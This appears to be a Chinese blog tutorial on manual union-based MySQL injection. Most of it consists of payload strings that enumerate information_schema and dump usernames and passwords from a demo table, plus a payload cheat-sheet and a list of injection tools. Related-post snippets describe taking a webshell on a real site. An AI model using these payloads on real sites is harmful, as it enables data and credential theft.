jsp页面判断输入编号已存在mysql中_网页渗透-现场教学Mysql手工注入

最新推荐文章于 2024-05-06 21:05:46 发布
最新推荐文章于 2024-05-06 21:05:46 发布
阅读量175 收藏
点赞数
文章标签: jsp页面判断输入编号已存在mysql中 mysql desc用法 mysql一个表中根据其分类查不同过的表

d294e6f3888ac7d0edcfc773c9b91b4e.png

917d1fe30a81f3a46a168fa3f43dd823.png


information_schema
SQL基础
1.1 什么是sql?
SQL(structured query language),即结构化查询语言,是关系数据库的标准语言,SQL是一个通用的、功能强大的关系数据库语言,但其功能并不仅仅是查询。
1.2 mysql
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。另外,MySQL是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。来源于百度百科
SQL注入基础
2.1 什么是SQL注入
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。简单来说,SQL注入就是一种通过操作输入(可以是表单,可以是get请求,也可以是POST请求等)来插入或修改后台SQL语句达到代码执行从而进行攻击的技术。
2.2 SQL注入攻击产生的原因
出现SQL注入攻击漏洞的主要原因是:许多网页程序员在编写代码的时候,没有对用户输入数据的合法性进行严格的判断和过滤,从而导致应用程序存在该漏洞。
2.3 mysql注入攻击的方法
对于mysql注入常用的方法主要是以下两种:(1)手工注入。(2)使用工具注入
2.4 mysql手工注入原理
在mysql手工注入中主要是利用mysql自带的information_schema数据库,information_schema这个数据库保存了MySQL服务器所有数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。简单点说,这台MySQL服务器上,到底有哪些数据库、各个数据库有哪些表,每张表的字段类型是什么,各个数据库要什么权限才能访问,等等信息都保存在information_schema数据库里面。
mysql手工注入详解
3.1 基本环境介绍
涉及数据库:learn,涉及表:users。

7366dfd53362bd811392bc485b997c7a.png


表users
3.2 判断注入点
and 1=1(正常显示), and 1=2(非正常显示) ,但不限于此。也可以是3>1(正常显示),3>5(非正常显示)等。
3.2.1判断uid是否存在注入点
本身查询语句为:SELECT uid,username FROM users WHERE uid=1

0994512e68ab75f730aad45bd613bceb.png


本身查询语句
3.2.2 判断原理
SELECT uid,username FROM users WHERE uid=1 and 1=1

1b543f6d26439af30d30a1e09d199d9d.png


正常显示
SELECT uid,username FROM users WHERE uid=1 and 1=2

858caa764b0163ff90f04879f9791ef9.png


非正常显示
3.3 查字段数
3.3.1 order by排序
order by 主要是用于排序,用法基本为:order by [ASC | DESC]
列名可以是select后面的列名,也可以是数字,代表第一列或第几列!查询字段数也是根据order by排序的列名可以是数字来进行判断的。
3.3.2 查当前查询中的字段数
本身查询语句:SELECT uid,username,phone FROM users WHERE uid=1

4e31d8fcdda3c53a9f2d7107ca0e0e28.png


本身查询结果
查当前字段数目(列数):order bySELECT uid,username,phone FROM users WHERE uid=1 ORDER BY 3

38406f49744ed7c6f59336237f4271b5.png


正常显示
SELECT uid,username,phone FROM users WHERE uid=1 ORDER BY 4

de4aa6c88d469cb6235b9e242e3b258a.png

非正常显示
因为当前页面查询的语句中只查询三个字段,所以当输入按照第四列来进行排序是就会出现异常。所以我们可用通过折半来进行查询列数,前一个正常,后一个异常,那么该正常的就是当前查询中的列数。
3.4 查询字段在页面中的显示位置
联合查询数据显示位置,不成立条件+union select(如果前面是成立的话页面中会看不到想要的信息),也可以是 前面条件不变+union select + limit m,1。(如果看到页面中信息有union select查询中的数字时,那么也是可以看到字段显示在页面中的位置,但是如果查询信息过多的话则不适用,因此推荐使用前面的那种方式)。SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,3

3882b4e9e5c03ab7bb1ae95fb5a5f11b.png


显示查询字段在页面中的位置
3.5 查询基本信息
查询基本信息主要是利用数据库中的内置函数来获取信息。1. version()——MySQL版本2. user()——用户名3. database()——数据库名4. @@datadir——数据库路径5. @@version_compile_os——操作系统版本我们可以通过将对应函数放到页面显示位中的位置数来查出相应信息并显示在页面中。SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT VERSION(),user(),database()

8e286d011c131c15fdfb08c5c41b2e01.png


查询基本信息
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT @@datadir,@@version_compile_os,database()

8cf36c0a0323f2b14cdf39411908ae64.png


查询基本信息
另外,我们可以使用字符串连接函数一次性查询多条信息:SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,group_concat(version(),0x3B,user(),0x3B,database(),0x3B,@@datadir,0x3B,@@version_compile_os)
0x3B是分隔符, ; 的十六进制!

2d77042d4fb5ec19ef2295f449464f21.png


使用连接函数查询多条信息

60b8fd10c80dc5c4f3b17157984340b5.png


连接函数例子
高级查数据库:SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,SCHEMA_NAME FROM information_schema.SCHEMATA LIMIT 9,1
LIMIT 9,1是从第9个数据库开始查询一条记录,使用这个可以逐个查询数据库中有哪些数据库。

70d3ce1bafc5e05cad306e3450705ef1.png


高级查数据库
只运行:SELECT 1,2,SCHEMA_name from information_schema.SCHEMATA LIMIT 8,3

95454f68b112170a74f13e814c820218.png


limit m,n 例子
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.SCHEMATA

8fdafdd5d0e7d93da19a9041183c96fa.png


查询当前连接中有哪些数据库
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(DISTINCT TABLE_SCHEMA) FROM information_schema.COLUMNS

6a91afee93d63cac96ade10cea07dcb9.png


查询当前连接中有哪些数据库
3.6 查表名
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,TABLE_NAME FROM (SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA=learn)a

734ea06cbf8f2a90e678d76cfd76d071.png

报错
这里需要将数据库名转化为十六进制

b67f268037ffca6fc865fefa54ef79a3.png


转化为十六进制
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,TABLE_NAME FROM (SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E)a

051b09e29b3b205d5af758c253c7f347.png


查询指定数据库表名
只运行SELECT * FROM information_schema.tables WHERE TABLE_SCHEMA=0x6C6561726E

1277e3d5668d1050c398bd445bcdc746.png


原理

7eeb8e64183492a19e1db662d902c68a.png


原理
高级查表SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E

4db37c8940b105dd22d9eb3fb36b773e.png


高级查表
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=0x6C6561726E

00ac469df97da6e213e9191ca738c381.png


高级查表
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(DISTINCT TABLE_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E

1c4abeefe119ea3245915b64f2d85609.png


高级查表
3.7 查字段
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,COLUMN_NAME FROM (SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E)a

0477f2eb1d338e8f2b82557f66317159.png


查字段
这里可通过limit m,n循环查询,也可使用GROUP_CONCAT函数一次性查询。

19e12d042d96be8d7baf15d7112c1ca2.png


一次性查询
只运行SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E AND TABLE_NAME=0x7573657273

e06ca509aecaa24d0f92fead50151782.png


原理
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,PRIVILEGES,COLUMN_NAME FROM (SELECT * FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E)a

bd21dd4255ac3075e336f42b0df721d4.png


原理
这里可以使用limit m,n来逐个(limit m,1)查询。
高级查字段SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E

871c1f33b773de2cd17cf49c91a288dc.png


高级查字段
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME=0x7573657273

64a2d21b750b3a3bfd9c29a4c951e545.png


高级查字段
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=0x6C6561726E

82a47bbd2b7b0f5de3f0b4c9eabd5502.png


查字段

5a526cd7b99bbe2b309eb198ed84b8ab.png


查字段
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME=0x7573657273

9ab9346cb5bcc2b8b4231e5603d6410e.png


高级查字段
3.8 查字段内容
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,username FROM users

486f7322b420b918dddb7c5b6c383ef5.png


查字段内容
这里可使用limit m,1来逐个查询,也可以使用GROUP_CONCAT函数一次性查询。

45c9b8e4791c18e2e4beb69cde2a2c55.png


使用连接函数
SELECT uid,username,phone FROM users WHERE uid=-1 UNION SELECT 1,2,GROUP_CONCAT(uid,0x3B,username,0x3B,password) FROM users

0e38f813bd217859833ae1f2c469f59f.png


连接函数一次性查询
工具注入
对于使用工具来进行注入,最好时首先手工判断下,如果是或者怀疑是,那么就可以丢给工具来进行注入。
4.1 SQL注入工具
工具有但不限于以下几种:sqlmap,BSQL、the mole、pangolin、enema sqli、SQLninja、sqlsus、safe3 sql injector、sql poizon、啊D、Havij、HDSI3.0、NBSI等。
4.2 工具注入优缺点
工具注入是可以节省很多时间,但是仅仅靠工具也不一定能利用该漏洞,因为工具有自己的局限性,不如手工那么灵活,简单来说,如果应用程序有了一定的过滤,那么就需要灵活地使用手工注入,如果程序在把查询语句插入到数据库中时把过滤了,那么就可以根据这一特性进行简单的绕过,如union select 1,2,3。
information_schema简单介绍
直接上图
用于加深对上面涉及到的相关信息的理解。详细信息请自行查看information_schema数据库里面涉及的相关表信息!

3bfb1d4bf7a76561ece679ce23a5e3fa.png


information_schema

50f6e5150ddb8ceac18fd71a5cfdecdb.png


information_schema.columns

cfefb133d48969fe23ad8eb866b80c35.png


information_schema.schemata

3b97ef2f427a963c8bd4f869d6cbe658.png


information_schema.processlist

f1d884c1a047dbe7700889cabc9ac9ea.png


information_schema.tables

2c50f5d3c077c8d14c1ca061c7e27c83.png


information_schema.partitions
以上这么复杂纯属装逼,下面分享简单版的mysql手工注入!
UNION SELECT 1,2,3,group_concat(schema_name),5,6,7 from information_schema.schemata 查所有数据库
UNION SELECT 1,2,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA='库名' 查表
UNION SELECT 1,2,COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='learn' 查字段
union select group_concat(字段,字段) from 表名

weixin_39900531
关注
web渗透--22--SQL注入(上)
武天旭的博客
09-15 9574
1、漏洞描述 所谓SQL注入,就是通过把SQL命令插入到Web单提交或输入域名或页面请求的询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。造成SQL注入漏洞原因有两个:一个是没有对输入...
78.网络安全渗透测试—[SQL注入篇17]—[Oracle+JSP-联合注入]
qwsn
01-20 2393
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 联合注入 1、注释符号 2、手工闭合方法 3、判断是否存在注入 3、判断列数:order by二分法排序` 4、联合询:判断回显位 5、联合询:获取Oracle的系统级信息 6、联合询:库名、名、字段名 7、联合询:数据/记录/字段值 8、Oracle的常用SQL语句 9、总结:
jsp mysql 注入攻击实例
xyjikl
08-19 4978
例子 要询信息 并显示出来 SQL  信息与admin 插入信息 md5 加密的密码 CREATE TABLE `admin` ( `Id` int(11) NOT NULL AUTO_INCREMENT, `Name` varchar(40) NOT NULL, `Psw` varchar(100) NOT NULL, PRIMARY KEY (`Id
jsp页面判断输入编号存在mysql_干货 | 带你零基础学习MySQL(二)
weixin_39557813的博客
11-27 99
相信大家已经装好软件了,那今天就跟着一起来实操吧。一、SQL语言简介SQL:Structure Query Language,用户完成数据库管理,数据增删改,其特点如下:每条SQL语句必须以分号结束;SQL自带的编程语言不区分大小写,例如:create 和 CREATE 都可以,一般在应用,软件会自动补齐,所以不必担心出错;但在给数据库、名命名时,需要主要大小写的区别,例如:table_a...
jsp mysql 注入_jsp mysql 注入攻击实例
weixin_29212429的博客
01-27 230
例子 要询信息 并显示出来SQL 信息与admin 插入信息 md5 加密的密码CREATE TABLE `admin` (`Id` int(11) NOT NULL AUTO_INCREMENT,`Name` varchar(40) NOT NULL,`Psw` varchar(100) NOT NULL,PRIMARY KEY (`Id`))ENGINE=InnoDB DEFAULT ...
mysql 4 注入_Jsp+Mysql网站注入并拿root权限的入侵全过程(图)
weixin_39850365的博客
01-19 224
很多人可能都知道asp,php的编程要防止sql注入漏洞,而并不知道jsp编程同样也需要防备sql注入漏洞.其实,一旦jsp代码有注入漏洞,将直接影响到整个系统的安全。本文就是主要展示一下我的一次JSP+MYSQL注入导出webshell的过程。www.***.***.cn是国内某一个著名研究所的网站,我们在这里对其进行善意的测试。当然,在写此文之前我已经将漏洞通知了网站管理员.并对文所有的图片...
简单jsp mysql注入_Jsp+Mysql注入Root权限全程
weixin_42396918的博客
01-20 230
4.获取服务器一般权限的shell有了管理页面我们自然想得到要通过图5的帐号登录进去并上传个JSPWEBSHELL,可是令人失望的是用这个帐号登录的时候发现既没有报错也没有成功登录进去.后来才从bbs目录下的readme.txt得知此bbs只允许其网站内部网ip进行管理,所以此路不通.其次,我们自然会想到mysql的root口令来获取shell.所以想看看index.jsp的源代码是否调用了...
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3134
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 199
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
2024年渗透测试流程-全(仅供学习,知识分享)_渗透测试教程(1),2024年最新还在等机会
最新发布
2401_84563080的博客
05-06 1141
openssl心脏出血  https://paper.seebug.org/437/  http://www.anquan.us/static/drops/papers-1381.html  https://www.freebuf.com/sectool/33191.html445/ smb。ladp注入  http://www.4hou.com/technology/9090.html  https://www.freebuf.com/articles/web/149059.html443/ ssl。
获取jsp的所有某个标签所有ID相同的元素
12-11
获取jsp的所有某个标签所有ID相同的元素
Safe3 SQL Injector V6.2版
09-22
Safe3 SQL Injector V6.2版,这是目前最强大的SQl注入工具,最新的Safe3 SQL Injector版本
mysql开始全程访问权限_由Jsp+Mysql注入到root权限的全程展
weixin_31879641的博客
02-04 117
最近有点空闲,所以写点垃圾文章来消磨一下时间.文没有什么技术含量,如果要转载,请注明作者并保持文章的完整.很多人可能都知道asp,php的编程要防止sql注入漏洞,而并不知道jsp编程同样也需要防备sql注入漏洞.其实,一旦jsp代码有注入漏洞,将直接影响到整个系统的安全。本文就是主要展示一下我的一次JSP+mysql注入导出webshell的过程。www.***.***.cn是国内某一个著名研...
jsp页面判断输入编号存在mysql_实战|MySQL联合注入
weixin_39929646的博客
11-28 79
在这里跟各位兄弟姐妹说声对不起,有一段时间没有更新文章。确实前段时间公司事情比较多,项目做不过来。请各位理解一下,以后尽量做到一周两更或三更。今天带来的是MySQL手工注入+实际站点,会从最基础开始讲起。希望能帮到刚入门的兄弟姐妹们。下面开始0x01 SQL注入原理:一、SQL注入就是一种通过操作SQL语句进行攻击目的的技术二、SQL语句是各大数据库...
jsp页面判断输入编号存在mysql_面试官让我聊聊Mysql基础架构之日志文件与数据文件...
weixin_39622178的博客
11-24 114
上一篇文章讲述了Mysql的基本框架,和sql执行的流程,这篇文章首先分析下每个流程的具体细节,然后介绍日志文件和数据文件以下面语句作为例子来分析流程每一步的具体细节:select * from t1 where id=10000;连接器mysql>mysql-uroot-p连接器负责建立、管理、维护连接,获取权限,当输入上面的命令的时候会要求输入密码,账户密码校验通过之后就...
简单jsp mysql注入_简单的在jsp页面操作mysql
weixin_39837105的博客
02-12 221
敲完这三行代码,mysql算是连上了。接下来就看下插入数据了插入成功,再看下数据库插入多行的话,代码:insert into inf values(),();(在jsp页面操作不要后面的分号)insert into 名 values()...;然后是修改现在是删除insert , update , delete 讲完了,现在我们看下询,询需要更多的代码如果是还没有学习jdbc(学了jdbc,...
jsp页面判断输入编号存在mysql_职场数据分析必备|数据库入门之MySQL安装...
weixin_40003233的博客
11-20 71
本文来源于CSDN博主「PyQuant」的原创文章。在日常数据分析的处理过程,对于数据库的学习不言而喻,如果说要想入门数据分析的话,有两个数据分析工具必须要掌握,一个是Excel软件,另一个就是数据库软件,当然,熟练使用Python、R软件,以及Tableau商务智能软件就更好了,可以用于数据可视化,总之,艺高人胆大,技多不压身,大概是这个道理。软件安装包获取,点击如下卡片。数据库入门(一)之M...
简单jsp mysql注入_一个简单的JSP 连接MySQL使用实例
weixin_26765287的博客
01-20 129
一、软件环境下载并安装MySQL,Tomacat,JDBC、MyEclipse或其他IDE。二、环境配置将其环境变量配置好之后,下载Java 专用的连接MySQL的驱动包JDBC,有人会发现在一些下载的JDBC压缩包里面发现若干文件, 比如:mysql-connector-java-gpl-5.1.34.msi的安装文件,那这个文件是干什么用的呢,它又与mysql-connector-java-5...
jsp mysql 注入_怎么防止sql注入
weixin_42100129的博客
02-01 208
一、SQL注入简介SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。二、SQL注入攻击的总体思路1.寻找到SQL注入的位置2.判断服务器类型和后台数据库类型3.针对不通的服务器和数据库特点进行SQL注入攻击三、SQL注入攻击实例比如在一个登录界面,要求输入用户名和密码:可以这样输入实现免帐号登录...
JSPMySQL结合实现页面计数存储方案
资源摘要信息:"jsp-mysql-counter.rar_jsp mysql" 知识点: 1. JSP (Java Server Pages): JSP是一种动态网页技术,允许开发者将Java代码嵌入到HTML页面。当浏览器请求JSP页面时,服务器会将JSP文件转换成servlet...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值